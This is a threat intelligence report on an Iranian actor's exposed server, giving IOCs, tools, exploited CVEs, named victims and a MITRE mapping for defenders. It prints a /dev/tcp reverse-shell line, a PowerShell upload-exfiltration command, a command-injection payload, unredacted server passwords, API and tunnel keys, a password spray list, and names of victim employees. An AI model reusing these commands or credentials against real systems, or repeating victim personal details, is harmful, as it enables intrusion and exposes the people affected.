Iranian Threat Actor: Tools, Techniques, IOCs, and IOAs

A note on publication timing

This report was distributed to ThreatHunter.ai subscribers on March 6, 2026. It was not published publicly at that time. We held it for eight days to give defenders who received it first a meaningful head start before the intelligence became widely available.

We are publishing it now in full, without sanitization, because everything in this report is directly relevant to understanding the Iranian cyber campaign that produced the Stryker wipe on March 11. The pre-positioning TTPs, the Rclone exfiltration to Wasabi, the credential infrastructure, the victim profile. It is all connected. Defenders deserve to see the full picture.

Server: sdrhi | Primary C2: 157.20.182.49

On March 6, 2026, I was working a lead on an Iranian threat actor's infrastructure when I found an open directory on their operational server. The hostname was sdrhi. The IP was 157.20.182.49. The server was live. Python SimpleHTTP was running on port 8888. The directory was open.

I read everything.

What follows is a full technical report on what was there: the tools, the targets, the credentials, the malware, the exploit code, the victims, and the data they had already stolen. Nothing is redacted. These are real indicators from a live operation against real organizations.

The server was active at the time of analysis. The operational period runs from March 2025 through March 2026. The targeting is Israeli-primary with secondary targeting across Egypt, UAE, Jordan, Saudi Arabia, and Portugal.

Overview

Category	Detail
Custom Tools	7 scripts and binaries
CVEs Exploited or Scanned	11
Confirmed Compromised Orgs	6+
Email Accounts Compromised	180+ (OWA brute force)
Israeli IPs Targeted	280+
Exfiltrated Data Types	Passports, credit cards, payroll, corporate docs, biometrics
C2 Infrastructure IPs	4
Meterpreter Payloads Generated	19+
SOCKS Proxy Tunnels	6+ simultaneous
Operator Handle	Sam (tmux sessions: 21sam, 23sam)

Threat Actor Profile

Attribute	Detail
Attribution	Iranian (Farsi-language artifacts, Iranian ISP blocks, targeting profile)
Operator Handle	Sam (tmux sessions: 21sam, 23sam); multiple operators indicated
Server Hostname	sdrhi
Primary C2 IP	157.20.182.49
Primary Language	Persian/Farsi (code comments, keyboard layout artifacts)
Hosting	Germany (de.archive.ubuntu.com apt mirror)
Operating System	Ubuntu Linux (Python 3.12.3)
Session Management	tmux (20+ named sessions)
Workspaces	im/, moz/, jojo/, tanbe/, mine/, sa/, holo/ compartmentalized by operation
Operational Period	Confirmed active January through March 2026
Primary Targets	Israel
Secondary Targets	Egypt, UAE, Jordan, Saudi Arabia, Portugal
Motivation	Espionage, data theft (PII, financial, corporate), persistent access

Threat Actor Infrastructure

IP Address	Role	Evidence
157.20.182.49	Primary C2 / Attack Server	All 19 msfvenom LHOST callbacks, reverse shell destination, OWA brute force origin, Nuclei scanning origin, file exfil receiver port 10443. German hosting.
162.0.230.185	Secondary Payload Server	Served x.exe on port 8000. Credentials in server.txt: root / G66BqeNV9hn35M8oQb
194.11.246.101	FortiOS Exploit Source	Hardcoded in POC_ZZ_1.py WebSocket login frame as source address 194.11.246.101:1338
18.223.24.218	Data Exfil (AWS EC2)	AWS EC2 US-East-2. Received stolen credit card data from E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\

Phishing Infrastructure

sso.bookairway.com: Phishing site with Let's Encrypt SSL certificate, Apache reverse proxy to Python backend on port 8080.

DNS Exfiltration Callback

01d5ed12-3bb2-41b1-9315-2fa7140945e3.dnshook.site: Used for DNS-based data exfiltration (md5sum of payload sent via nslookup).

File Hashes

SHA256	Filename	Description
95bf653a233a0b8d5be504bf56b6703e7479e54c8f4573947d64baec638833cb	owa.py	Async OWA brute forcer (aiohttp, 100 concurrent)
54fe2f395a5b255eaac0f88261165982ad1da766b65cde5639257d53242106cd	owa-2.py	Threaded OWA brute forcer with combo mode
fd6b46d148af22da6163f18ce43b35ebb827cc6e140f03f0f514bc2a6f548743	POC_ZZ_1.py	CVE-2024-55591 FortiOS exploit (modified watchTowr)
4150aeab40fb979995e701f78731a0897d06616c7426973cbcf8a18c5c3dc58a	cve.yaml	Nuclei template, CVE-2025-54068 Laravel Livewire RCE
443fd4bf218cf11df015c5e5f13649011a9754d48831ed0fb6de96ed4907623d	cve-2.yaml	Nuclei template, CVE-2026-24061 telnetd auth bypass
7ab597ff0b1a5e6916cad1662b49f58231867a1d4fa91a4edf7ecb73c3ec7fe6	reset.ps1	Obfuscated PowerShell malware dropper (2.2MB)
8ca5be8eed3fd564a11689f0ae7343d46f00c633a5ea8275a7c8cd91a095f9f7	bin	Subfinder binary (Go ELF x86-64, statically linked)
eae1ae69b6e678229b69b49a3f884ed727a03fa11c25f154cc88785a6924c170	web.py	Flask file exfiltration receiver (port 10443)
7745d3a1a5e758bebe01940f3c407d66f5223dbbf9e4c4187536b0bbaabd0bd2	adbencrypt.exe	PE32, ZKTeco encryption utility
a90d7d53b0f2f2aab99c19141c5de10b4fdf2818e2860798c836d48ff1c6a117	Att.exe	PE32, ZKTeco attendance (PECompact2 compressed)
c790f5f6c08ee61935365cd1631a21e5261f03a04dcb361824573fb1268f5351	setup.exe	PE32, ZKTeco installer

Webshell Indicators

Indicator	Value
Webshell Type	Neo-reGeorg ASPX tunnel
Webshell Key	123QWEasd
Path Pattern	/aspnet_client/system_web/4_0_30319/nfud.aspx
Deployed Location 1	https://mail.sef.pt/aspnet_client/system_web/4_0_30319/nfud.aspx (Portuguese Immigration Service, SEF)
Deployed Location 2	https://69.167.160.144/nfud.aspx
SOCKS Proxy Ports	1080, 1085, 10800, 10843, 10850, 10555, 10830
Listener Ports	443, 4040, 1085

Credential Artifacts

Resocks / Revsocks Encryption Keys

Key / Password	Tool
bqLe1ch3x53bdWnbOH4yyCLmakBzW0Hne3wM7LI13Kc	Resocks (primary, used 20+ times)
LVUYcklWVT4X+hIF9GXnACw8HjA39S/VM4cJwXn3km8	Resocks
XHEUq0eV8JjQqBa35zag1rw0I+KIWSBtITZOxzg/kkc	Resocks
89aFTqq2PJBpBXzxD54/aRi5nsDx8dy4QyCaMjFuE0o	Resocks
SuperSecretPassword	Revsocks password

Staging Server Credentials

IP	Username	Password	Source
162.0.230.185	root	G66BqeNV9hn35M8oQb	server.txt

API Keys and Tokens

Service	Key
Shodan API Key	MijnMaksNo4GCF6KlnWBbh52VMC47Hxm

User-Agent string used in scanning: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

Custom Attack Tools

owa.py: Async OWA Brute Forcer

Attribute	Detail
Language	Python 3 (aiohttp, asyncio)
Concurrency	Up to 100 simultaneous connections via asyncio.Semaphore
Target Endpoint	/owa/auth.owa
Success Detection	HTTP redirect Location header to /owa (vs /auth/logon.aspx for failure)
Features	Progress tracking with ETA, retry logic (3 attempts with backoff), proxy support, Persian-language code comments
Banner	OWA Fucker
Output	URL\|username\|password format to success.txt

owa-2.py: Threaded OWA Brute Forcer

Attribute	Detail
Language	Python 3 (requests, ThreadPoolExecutor)
Modes	Brute force (-m bf) and combo (-m combo) for paired user:pass lists
Expired Password Detection	Detects redirect to /auth/expiredpassword.aspx, saves to expiredpassword.txt
IP Block Detection	Identifies HTTP 400 responses indicating IP-based blocking

web.py: File Exfiltration Server

Attribute	Detail
Language	Python 3 (Flask)
Port	10443
Endpoint	POST /success, accepts file uploads, saves with original filename
Client Command	PowerShell: New-Object System.Net.WebClient; $wc.UploadFile(http://IP:10443/success, filepath)
Confirmed Exfil	E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\ (credit cards); C:\Users\riyad\desktop\ (full desktop)

reset.ps1: Obfuscated PowerShell Dropper (2.2MB)

A heavily obfuscated PowerShell script functioning as a malware loader using Node.js as a Living-off-the-Land Binary.

Stage	Behavior
Stage 1	Creates %USERPROFILE%\AppData\Local\Nodejs\
Stage 2	Downloads Node.js v18.17.0 from nodejs.org (legitimate binary used as LOLBin)
Stage 3	Adds Node.js directory to user PATH environment variable
Stage 4	AES-CBC decrypts hex-encoded embedded payload using hardcoded key and IV
Stage 5	Writes decrypted JavaScript to sysuu2etiprun.js
Stage 6	Runs npm install for required packages
Stage 7	Executes JS payload via downloaded node.exe
Stage 8	Autorun mechanism for persistence across reboots

Obfuscation: Extensive junk variables, random GUIDs, meaningless function names, dead code branches.

Exploit Code

POC_ZZ_1.py: FortiOS CVE-2024-55591

Weaponized version of the watchTowr proof-of-concept for CVE-2024-55591 (FortiOS/FortiProxy authentication bypass via WebSocket). The actor modified this PoC to:

Create super_admin accounts: FortiWiFi/FortiWiFi123, FortiSetup, FortiAdmin
Add created users to VPN user groups: ssl-vpn-groupamoss, VPN-Users
Enumerate existing VPN users and groups
Hardcode victim-specific configurations with Israeli employee names: shachar, sigal, amos, sima, lev, gabi, roy
Reference Israeli company email: offices@agentek.co.il
Include encoded password hashes from compromised FortiGate devices

Custom Nuclei Templates

Template	CVE	Target	Type	Severity
cve.yaml	CVE-2025-54068	Laravel Livewire v3	Deserialization RCE	Critical
cve-2.yaml	CVE-2026-24061	GNU Inetutils telnetd	Auth Bypass to root	Critical (9.8)

Meterpreter Payloads

19 Meterpreter payloads generated via msfvenom, all calling back to 157.20.182.49:443:

Payload Name	Type	Format
shell.elf	linux/x64/meterpreter/reverse_tcp	ELF
2026.elf	linux/x64/shell_reverse_tcp	ELF
999.elf	linux/x64/meterpreter/reverse_tcp	ELF
666.elf	linux/x64/meterpreter_reverse_tcp	ELF
1.elf	linux/x64/meterpreter_reverse_tcp	ELF
0.elf	linux/x64/meterpreter_reverse_tcp	ELF
last.elf	linux/x64/meterpreter_reverse_https	ELF
zip.elf	Multiple types tested	ELF
aspx.aspx	windows/x64/meterpreter_reverse_https	ASPX

CVEs Exploited or Scanned

CVE	Product	Severity	Activity	Confirmed Targets
CVE-2024-55591	FortiOS / FortiProxy	Critical 9.8	Active exploitation, creates super_admin accounts, adds VPN users	Multiple Israeli FortiGate devices
CVE-2024-23113	FortiOS (format string)	Critical	Two exploit repos cloned, PoC executed against 212.29.200.149	1+ confirmed
CVE-2026-1281	Ivanti EPMM	Critical	Mass scanning via custom Nuclei template against 5,304 Shodan targets	5 confirmed: 185.55.15.173, 49.255.190.4, 84.72.235.18, 86.51.13.69, 88.151.16.232
CVE-2025-54068	Laravel Livewire v3	Critical	Custom Nuclei template for deserialization RCE	9 confirmed
CVE-2025-34291	Langflow	Critical	Mass scanning against target list	50+ confirmed
CVE-2025-52691	SmarterMail	Critical	Mass scanning against target list	50+ confirmed
CVE-2025-9316	N-able N-Central	Medium	Mass scanning plus active WebSocket RCE exploitation	50+ scanned, 3+ actively exploited
CVE-2025-68613	N8N	Unknown	Nuclei scanning	Unknown
CVE-2025-47813	Unknown (loginok.html)	Medium	Mass scanning	50+ confirmed
CVE-2026-24061	GNU Inetutils telnetd	Critical 9.8	Custom Nuclei template for auth bypass	56 targets in ips.txt
N-Central WS RCE	N-able N-Central	Critical	WebSocket command injection via hax[$(cmd)] payload	3+ actively exploited

Confirmed Victims and Impact

Confirmed Compromised Organizations

Organization	Domain / IP	Country	Impact
EgyptAir (Riyadh Station)	email.egyptair.com	Egypt / Saudi Arabia	Full data exfiltration: passports, visas, payroll, credit card data (Amex), corporate documents, ZKTeco biometric DB, SGS records. Path: E:\DATA\PEACE2\Personnel_Share\
Bavaria Group Egypt	mail.bavaria.com.eg	Egypt	37 OWA accounts compromised with passwords P@ssw0rd and 123456
Intercom Enterprises	mail.intercom.com.eg	Egypt	143+ OWA accounts compromised; 50+ expired password accounts
Sino Tharwa Group	mail.sinotharwa.com.eg	Egypt	Expired password credential hits
Portuguese Immigration (SEF)	mail.sef.pt	Portugal	Neo-reGeorg webshell on Exchange server for persistent access and tunneling
Unknown	69.167.160.144	Unknown	Neo-reGeorg webshell deployed
Multiple FortiGate victims	Various Israeli IPs	Israel	Admin accounts created, VPN users added via CVE-2024-55591

Targeted Organizations (Recon / Scanning / Brute Force)

Organization	Domain / IP	Country	Activity
NMDC Group	mail.nmdc-group.com	UAE	OWA + SMTP brute force, full AD username enumeration (77 admin accounts)
Terem Medical Centers	mail.terem.com	Israel	OWA brute force, full AD user enumeration (123 accounts)
GoHost	gohost.co.il	Israel	OWA brute force
Jewish Agency	jewishagency.org	Israel	Subdomain enumeration
Nefesh B'Nefesh	nbn.org.il	Israel	Subdomain enumeration
Yahel Israel	yahelisrael.com	Israel	Subdomain enumeration
Terrogence	terrogence.com	Israel	Subdomain enumeration (Israeli intelligence firm)
Salam Palestine	salampalestine.org	Palestine	Subdomain enumeration
Clearview AI	clearview.ai	USA	Subdomain enumeration + Nuclei scanning
Jordanian Government	webmail.gov.jo	Jordan	Probed
280+ Israeli OWA servers	Various 62.90.x, 84.110.x, 51.x, 212.x	Israel	Mass OWA brute force campaigns
95 SMS/Telecom providers	Various (domains.txt)	Israel/Global	Reconnaissance of Israeli SMS infrastructure

Data Exfiltration Evidence

EgyptAir Riyadh Station: Complete Data Theft

The threat actor's webserver (http://157.20.182.49:8888/webserver/) was hosting exfiltrated data from EgyptAir's Riyadh maintenance station. Data was exfiltrated using PowerShell WebClient.UploadFile() commands found in up.txt, targeting both the primary C2 (157.20.182.49:10443) and an AWS instance (ec2-18-223-24-218.us-east-2:443).

Data Category	Files	Sensitivity
Credit Card Data	Contents of E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\	Critical, PCI violation
Employee Passports	Passport scans: Abu Rehab, Hassan Sami, Youssef Zeidan, Mohamed Ahmed	Critical, PII
Employee Visas	Saudi visa documents with phone numbers	High, PII
National ID Cards	Personal ID card documents (Arabic)	Critical, PII
Salary / Payroll	Monthly transport allowances for 7 named employees, annual salary statement 2021-2022	High, Financial PII
Financial Records	Daily revenue, July 2025 revenue, airport receipts, insurance records, compensations	High, Corporate confidential
Corporate Documents	Company mail forms, discharge forms (EN/AR), cancellation letters, damage reports	Medium, Corporate
Biometric Data	Complete ZKTeco time and attendance system (setup.exe, Att.exe, encrypted DBs, .dbf files)	Critical, Biometric PII
SGS Records	Saudi Ground Services data spanning 2019-2025	High, Corporate
Bank Reports	Alinma Bank report (Saudi bank)	High, Financial
WhatsApp Media	4 images + 1 video from employee phones (Aug-Nov 2025)	Medium, Personal
Desktop Contents	Full recursive contents of C:\Users\riyad\desktop\	High, Unknown scope

Cloud-to-Cloud Exfiltration

Rclone was used to copy ERPBackup data from Wasabi cloud storage (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin). The actor had access to an organization's ERP backup in Wasabi and transferred it to a personal Put.io account for persistent offline access.

TTPs: MITRE ATT&CK Mapping

Technique	Tactic	Name	Evidence
T1595.002	Reconnaissance	Vulnerability Scanning	Mass Nuclei scanning against Shodan-harvested targets: Ivanti EPMM (5,304), N-Central, Langflow, SmarterMail, N8N, FortiGate
T1593.002	Reconnaissance	Search Open Technical Databases	Shodan queries: title:'Ivanti User Portal', http.favicon.hash:1983356674, http.favicon.hash:362091310
T1589.001	Reconnaissance	Gather Victim Identity: Credentials	Username enumeration of AD domains: NMDC, NMDCDOM, terem, EgyptAir (200+ accounts each)
T1583.001	Resource Dev	Acquire Infra: Domains	sso.bookairway.com, phishing domain with Let's Encrypt SSL
T1583.003	Resource Dev	Acquire Infra: VPS	157.20.182.49 (Germany), 162.0.230.185, AWS EC2 18.223.24.218
T1587.001	Resource Dev	Develop Capabilities: Malware	Custom OWA brute forcers, reset.ps1 dropper, web.py exfil server
T1587.004	Resource Dev	Develop Capabilities: Exploits	Modified CVE-2024-55591 PoC, custom Nuclei templates
T1190	Initial Access	Exploit Public-Facing Application	CVE-2024-55591, CVE-2026-1281, CVE-2025-54068, CVE-2025-34291, CVE-2025-52691, N-Central WS RCE, CVE-2026-24061
T1110.001	Initial Access	Brute Force: Password Guessing	Mass OWA brute forcing: mail.bavaria.com.eg (37 hits), mail.intercom.com.eg (143+ hits)
T1110.004	Initial Access	Brute Force: Credential Stuffing	OWA combo mode (-m combo) pairing harvested user:pass lists
T1566.002	Initial Access	Phishing: Spearphishing Link	sso.bookairway.com phishing infrastructure
T1059.001	Execution	PowerShell	reset.ps1 dropper: AES decryption, Node.js download, JS payload execution; PowerShell WebClient for data exfil
T1059.007	Execution	JavaScript	Decrypted JS payload (sysuu2etiprun.js) executed via downloaded Node.js runtime
T1059.004	Execution	Unix Shell	bash -i >& /dev/tcp/157.20.182.49/9001 0>&1
T1203	Execution	Exploitation for Client Execution	FortiOS WebSocket command injection, N-Central hax[$(command)] injection
T1505.003	Persistence	Web Shell	Neo-reGeorg ASPX webshell (nfud.aspx) at mail.sef.pt and 69.167.160.144
T1136.001	Persistence	Create Account: Local	FortiOS exploit creates FortiWiFi (super_admin), FortiSetup, FortiAdmin; SSH user asuedulimit
T1547	Persistence	Boot/Logon Autostart	reset.ps1 persists Node.js payload as autorun
T1110	Credential Access	Brute Force	Custom OWA brute forcers, SMTP brute forcing via Patator against mail.nmdc-group.com:587
T1110.003	Credential Access	Password Spraying	P@ssw0rd, 123456, Welcome@123 sprayed across hundreds of accounts
T1557	Credential Access	Adversary-in-the-Middle	Responder tool present for LLMNR/NBT-NS/MDNS credential harvesting
T1071.001	C2	Web Protocols	Neo-reGeorg SOCKS tunneling over HTTPS through webshells
T1572	C2	Protocol Tunneling	Resocks/Revsocks encrypted reverse SOCKS, Neo-reGeorg, ICMP tunneling
T1573.001	C2	Encrypted Channel: Symmetric	AES-encrypted PowerShell payload, Resocks encrypted tunnels with pre-shared keys
T1090.002	C2	External Proxy	Multiple SOCKS proxy layers on ports 1080, 1085, 10800, 10843, 10850, 10555, 10830
T1219	C2	Remote Access Software	Custom RDP C2 server (./server binary in rdp/c2 directory) on ports 443, 12345, 9999
T1095	C2	Non-Application Layer Protocol	ICMP tunneling tools (icmp and app_linux binaries) for C2
T1567.002	Exfiltration	Exfil Over Cloud Storage	Rclone: Wasabi (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin)
T1048.003	Exfiltration	Exfil Over Alternative Protocol	DNS exfiltration via dnshook.site
T1041	Exfiltration	Exfil Over C2 Channel	HTTP file upload via web.py Flask server (PowerShell WebClient.UploadFile)
T1560	Exfiltration	Archive Collected Data	ZIP archives of exfiltrated data

Appendix A: Password Spray List (Top 50)

P@ssw0rd        P@ssw0rd123      123456           Password1        Welcome@123
admin@123       P@ssw0rd1        Welcome@1        admin123         Aa123456
P@ssw0rd2024    P@ssw0rd2025     March@2025       March@2026       October@2024
October@2025    December@2026    Welcome1         Password         12345
123123          P@ssw0rd12       P@ssw0rd11       L3tm31n          abc123
1qazZAQ!        qwer1234         Passw0rd         Password@123     Admin@123
Admin@1234      P@$w0rd         P@$w0rd1        Ch@nge#1         Ch@nge1#
Welcome@2024    Welcome@2021     Jan@2025         Berlin@2026      Honda@2026
P@kistan786     Cloud@393        Oracle@3535      Helpdesk@123     Support@1234
Pass@123456     password         12345678         123456789        Aa12345@

Appendix B: Target IP Ranges (Israeli Focus)

IP Range	ISP / Owner	Count
62.90.x.x	Bezeq International	20+
84.110.x.x	Bezeq	15+
51.x.x.x	Various cloud providers (OVH, AWS)	50+
212.x.x.x	Various Israeli ISPs	20+
147.235.x.x	Israeli hosting	10+
192.116.x.x / 192.117.x.x	Israeli academic/enterprise	10+
82.80.x.x / 82.81.x.x / 82.166.x.x	Israeli ISPs	15+
213.8.x.x	Israeli networks	10+
31.154.x.x	Israeli networks	10+
185.x.x.x	Various hosting	15+

The ips.txt file contains 56 telnet (port 23) targets for CVE-2026-24061 exploitation, spanning Egyptian (41.x.x.x, 197.x.x.x) and Israeli IP ranges.

Recommendations

Immediate Actions

Block attacker infrastructure: 157.20.182.49, 162.0.230.185, 194.11.246.101, 18.223.24.218
Block phishing domain: sso.bookairway.com
Block DNS exfiltration domain: *.dnshook.site
Search all Exchange servers for Neo-reGeorg webshells: nfud.aspx in /aspnet_client/ paths
Audit FortiGate admin accounts for unauthorized users: FortiWiFi, FortiSetup, FortiAdmin
Force password reset for any account using passwords from the spray list above
Review OWA authentication logs for brute force patterns from the identified attacker IPs

Patch Priority

Product	CVE(s)	Priority
FortiOS / FortiProxy	CVE-2024-55591, CVE-2024-23113	CRITICAL, Active exploitation confirmed
Ivanti EPMM	CVE-2026-1281	CRITICAL, 5,304 targets scanned, 5+ confirmed vulnerable
Laravel Livewire v3	CVE-2025-54068	CRITICAL, 9 confirmed vulnerable
Langflow	CVE-2025-34291	CRITICAL, 50+ confirmed vulnerable
SmarterMail	CVE-2025-52691	CRITICAL, 50+ confirmed vulnerable
N-able N-Central	CVE-2025-9316 + WebSocket RCE	HIGH, Active exploitation confirmed
GNU Inetutils telnetd	CVE-2026-24061	HIGH, Auth bypass to root

ThreatHunter.ai is an 18-year SDVOSB cybersecurity company. This intelligence was collected from open-source analysis of exposed threat actor infrastructure. No systems were accessed beyond what was openly published by the actor. If your organization is listed above and has not yet been notified, contact us.